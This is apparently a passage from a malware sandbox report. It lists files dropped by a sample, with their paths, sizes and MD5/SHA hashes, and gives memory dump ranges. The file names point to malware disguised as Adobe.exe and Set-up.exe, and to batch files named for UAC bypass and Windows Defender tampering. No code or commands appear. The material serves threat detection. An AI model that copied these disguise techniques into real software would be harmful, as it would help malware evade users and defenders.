5ac062ed90a80b80c6e965d0083d6954a4a1f7b9b3948e8b2958004652c4e431244aa385fdf30e6ae369f2a961f2a4abfb295cd4d36874e3521679f4c1e3d4bc

Download Submit
C:\ProgramData\extracted\file_7.zip

Filesize
579KB

MD5
539d9f879e17151705dacb13f797f1aa

SHA1
b9dd5b23ffd1d1594d5bc69cde270aedf3de8b67

SHA256
a975e8a5ddaa3e35c99a6379d1a0c1f3ca85c3386c322b63a0be7ad1f878f7d4

SHA512
3b10b3c0a3206ac013073de1be4d892d56fa143a195690dff96b4bcca8455ee4e5f35e8c6dc5ead4ffd688de3e78034e9874b0446e8d3d89977afcfef43006d3

Download Submit
C:\ProgramData\extracted\file_8.zip

Filesize
579KB

MD5
cbd21ca9e5086813bdeaaf5e0f7a2358

SHA1
f497db4a1ff16ee8f81016815da8dabfabba2ff9

SHA256
fa023433d0cf6fd8c39a0d3d3a6fd82c56fc120d3b603fa2ddaec50b42583007

SHA512
dc4cfbaec3d65b5aaebeac1aaff40ec9725b5596d4869216ed03aff0cddc1781959d5a1f47e37bb1bc8e2cf9b64e3d8256430d784d1b38ccf7867e9418ea4223

Download Submit
C:\ProgramData\extracted\file_9.zip

Filesize
2.0MB

MD5
ae2c632a667e68976fb88a7682586951

SHA1
eebd5f7fd72d2af3c802757bb9af592e88669c78

SHA256
4cea89b96f5e8650c440d737be8cd574211538df26d28eee97c9ba94393ee9e2

SHA512
d9da6900ef5172abe39c927c64aa56cc53d836af600552d7e3f656af46a125ef29c2654766e0ff858ebfb929a4cf2ceab308dd7cc307a6cca02a60822dcc1ebd

Download Submit
C:\ProgramData\file.bin

Filesize
2.3MB

MD5
70fc649e1636c2705138783ee5495ad9

SHA1
fd66954bd03d7549dbc337f7d4939a3c1d57d0f2

SHA256
711a49c3f419fb284eeca6b7ad9e52f5471562a760f269e32d1f930eb50750fe

SHA512
19c257d12acebc4be39daa483df237e917fb09b26e62e4051437029df28a3ffe738b52573d6f3ba13b770884be2f18b66fc1b85109209fe2e91fbceeb37753af

Download Submit
C:\ProgramData\file.bin

Filesize
2.0MB

MD5
c439fa38d73b7548100c3ef8b30ae5f8

SHA1
ab3f05798c93049c0a0dabb0996cb5ce2d4f21a0

SHA256
a9130c4d7571821a0bbd7731e329bbb3b3fc0da57c1170f392db84d8ffa76b7c

SHA512
4371aee58d3a8a1c58b463e02c9ae07d3483b30766af35eba103a3ff47cd9f3be80d5c52efc91fe9d53c4209dc9772f1f87c72bedc6c3043dc841f68d4dc94f1

Download Submit
C:\ProgramData\main.bat

Filesize
389B

MD5
d9cf681686547265496d12488ea5ff37

SHA1
e62e3980995d3799228ee1806f0c1b21c985fb56

SHA256
25473e23f350ec5ba71151914e51c4511548917ca0304ee4de57f0ddb139b8a6

SHA512
8bb88c8a68a0938586424adf72f83bcec235b7d0218449d98730496cc902f4f0a2b1ce2638158be299067605455fb3ead5da9afd68c547fdde6021d31b655b33

Download Submit
C:\ProgramData\main.bat

Filesize
383B

MD5
564689fbb804cae85e189fa356bdffab

SHA1
032abc812bd5979f8e4d89c9a9ebc318cab4faee

SHA256
a74020b5c6eeb0444ba3de36d1cb37b578107d3fa78acfa5110eb5b1d06aaa2c

SHA512
4b4aef287663c466acd360047c107c807e50efa5e8eee12bf196209df5d5e5412dbdd4b1ae0c0bec9f6b4dfc41a6429a864d94280e3f2087e9a6fb3f4e2cc62a

Download Submit
C:\ProgramData\wu10.2run.vbs

Filesize
138B

MD5
5a14fa9448a36120fa13e30c1c27cea1

SHA1
d9ee005ff4638392b77541a9ceddbf17df53ab82

SHA256
9371524b0fdb3d92b5c7c90f040c962ca129395d4688ef898087045223ee6f73

SHA512
8f861200363a9d9784b0be584bd90d3dc1f9b7f77710c6bd160e8d7c8989e6330b10e9cfecd25dd13158ab1d28d6925ef9135e73c185fe211de1129122aa2a1f

Download Submit
C:\ProgramData\wu10.delete.bat

Filesize
255B

MD5
ee0996325569f1a4739509708717f8f3

SHA1
3514f1e94cb2f745ed8ff84875fd2d90a9e68bc7

SHA256
7631ab00b4b6868f57e9ed5e80bc5b12457ea912759490cbea95101f7918844a

SHA512
6b6a66ff69e4945328a868a31ef07cac425a1372c77e9cd090d5637d9686555506ce851d72473263d522bef07a9ba2bd39e59cc50f9218588dd0e00021068f4d

Download Submit
C:\ProgramData\wu10.run.vbs

Filesize
131B

MD5
9acf11d00161e3f209c06e4577eb42c6

SHA1
bed9c68c145ce8bdf7f3d60d374891fd57e72bb1

SHA256
17432647b9096ed21d2a1ba618e11feef7f055f51abdd19ef23a85142ec1b51b

SHA512
271fc2d1264ac153c847a0ad75654bdeb2062217629e68e085f338c22a70e558d9f89c358e5428548f9ab0d754bfcd7d6211696f39535f2672a2b98c65b89baa

Download Submit
C:\ProgramData\wu10.uac.bat

Filesize
366B

MD5
408e11f699d802ea56fabac297802c5e

SHA1
c07e71e98a52511dfd1c8ffb2803a41d6b9b3f8f

SHA256
1e86c340c81834db772c9e1e48f89534eeed9b386bc5b02d5907fc8f71ea4fe4

SHA512
e165b551abeba9ee85efc7d89b98fa822c203d24d5ce7e175acb7da43eab944a35a01fb3891ff7ad852a1cc33b549fbb96d84b8f10978bd5332b54fc2a22e126

Download Submit
C:\ProgramData\wu10.wdcloud.bat

Filesize
1KB

MD5
c830fde2d469ea25922346b9166da248

SHA1
8dc4fa362b2f79b5294265981256e623553172f9

SHA256
59ee85c3ee8a0cb34a2b82168456748731d3ae81d15b0806ed861a5be0c012c1

SHA512
a045bca872978579e7d5039fdce839a6de98e4a8e5031a809653cdc0b11832a89d2076be0fc1d8456baaf62947e43934827b37cef815a8cee1918d80280656bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabE39D.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarE4F7.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe

Filesize
6.2MB

MD5
f29f5feaf2450576bf14ca53c90d0059

SHA1
7262f9605fdd224341aa01a3b5912c09171bfcdc

SHA256
18c282c1f2bbc302d317a2f4037072355910f3c3425f446a8a8692652a175520

SHA512
14dfa735b3e7fb1572122c43625be1e61b8c28b1c08cacfb7bd55172e8d2b8db6afa07b4e5822bbf90d9a5f34e368fe67b440779a1d0a01b71f5cb897803b25c

Download Submit
\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe

Filesize
7.3MB

MD5
de70f0deed893bba56ccb78eafd59606

SHA1
f351b0c2996a3573d36deab9b6b3961876189f71

SHA256
b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d

SHA512
86459d1e7ba8480cf005087450d7dcf969dcd6f6fd228012d7542539ff74d72105a35b3a8d8216e1b44cdee21730a1ddb32d9b5d20073099cb4da5a56c77fc41

Download Submit
\Users\Admin\AppData\Local\Temp\is-KI1PG.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp

Filesize
2.5MB

MD5
7b493e07a8a18509ad2e3fcb4a7e5fa9

SHA1
9f9b9e80000d1e5311ad66a8ee78df9ecbedde9c

SHA256
fee6096ebb65358593028523d91e380be7cdd9d1ff0c1da1aeff06b510ebb9da

SHA512
3dcb03337504bf41376f1ee3c6bf87a02704ab95befa965beae314d1f405bed5617ff25c7ba787507a726e5684ad6b8019e80b9e191b8b5a6b7bf2b9f799533a

Download Submit
memory/568-34-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/568-150-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/1756-59-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/1756-0-0x0000000000400000-0x00000000004D2000-memory.dmp

Filesize
840KB

Download
memory/1756-2-0x0000000000401000-0x00000000004A9000-memory.dmp

Filesize
672KB

Download
memory/2160-9-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/2160-57-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/2212-257-0x0000000000BF0000-0x0000000000CEC000-memory.dmp

Filesize
1008KB

Download
memory/2212-274-0x00000000002F0000-0x0000000000310000-memory.dmp

Filesize
128KB

Download
memory/2212-278-0x0000000000420000-0x0000000000426000-memory.dmp

Filesize
24KB

Download
memory/2620-148-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download